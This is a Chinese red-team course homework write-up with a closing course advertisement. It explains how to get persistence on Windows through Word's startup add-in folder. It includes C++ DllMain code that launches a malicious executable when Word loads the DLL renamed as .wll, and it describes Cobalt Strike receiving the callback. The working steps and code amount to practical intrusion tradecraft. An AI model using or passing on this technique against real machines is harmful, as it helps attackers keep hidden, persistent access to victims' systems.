文章来源｜MS08067 红队培训班第10节课作业

本文作者：谢耀伟（红队培训班学员）

按老师要求完成布置的作业如下：

关于 office 的注册表

location0

%APPDATA%\Microsoft\Templates 是模板⽂件

location1

C:\Program Files (x86)\Microsoft Office\Root\Templates\ 

也是模板⽂件

location2

%APPDATA%\Microsoft\Word\Startup

Office 的外部插件是 DLL ⽂件，扩展名不同，表示使⽤不同的应⽤程序，例如 .wll 代表 Word，.xll 代表 Excel。Metasploit Framework 的“msfvenom”可⽤于创建可被使⽤的 DLL ⽂件，然后将扩展名修改为“.wll”（Word 插件程序的扩展名），并将⽂件移动到 Word 启动⽂件夹，每次 Word 启动时执⾏外部插件

原理
三件套都可以加载插件，利⽤路径为：插件路径下的 dll → dll 代码中加载恶意 exe → 上线
注册表中

计算机\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Locations\ 

下有三个 location

我们使⽤ location2，这个是 Word 插件的⽂件夹，Word 启动是会⾃动加载此处的 dll ⽂件

实战
路径（路径栏输⼊ %data% 可以快速进⼊ Roaming 路径）：

C:\Users\Laughing\AppData\Roaming\Microsoft\Word\STARTUP

这个路径下放⼊ dll ⽂件，每次 word ⼀打开

但是不能使⽤ cs 默认⽣成的 dll ⽂件，需要使⽤ vs studio 重新⽣成

生成 dll ⽂件
创建新项⽬ → 动态链接库 → 创建

⼀直下⼀步就可以看到⽣成的 cpp 和⾃动⽣成的代码了

添加关键代码

// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include <stdlib.h>//添加库
BOOL APIENTRY DllMain( HMODULE hModule,                       DWORD ul_reason_for_call,                       LPVOID lpReserved                      ){    switch (ul_reason_for_call)
    {    case DLL_PROCESS_ATTACH:            system("start D:\\artifact.exe");//此行为恶意exe路径    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:           break;     }    return TRUE;}

生成 dll

选择 release 版本，x86 架构，点击 ⽣成 → 重新⽣成解决⽅案

然后将⽣成的 dll ⽂件复制粘贴到 STARTUP 路径下，然后更改后缀名为 wll

上线
打开 Word ⽂档，CS 即可看到上线

红队安全培训 第二期班 8月13号开班，第二期的课程大纲目录根据第一期班的同学的反馈和要求，已有重大调整，增加了更多的实战中红队的渗透思路和实战技巧干货，具体授课目录可联系小客服获取！

扫描下方二维码加入星球学习

加入后邀请你进入内部微信群，内部微信群永久有效！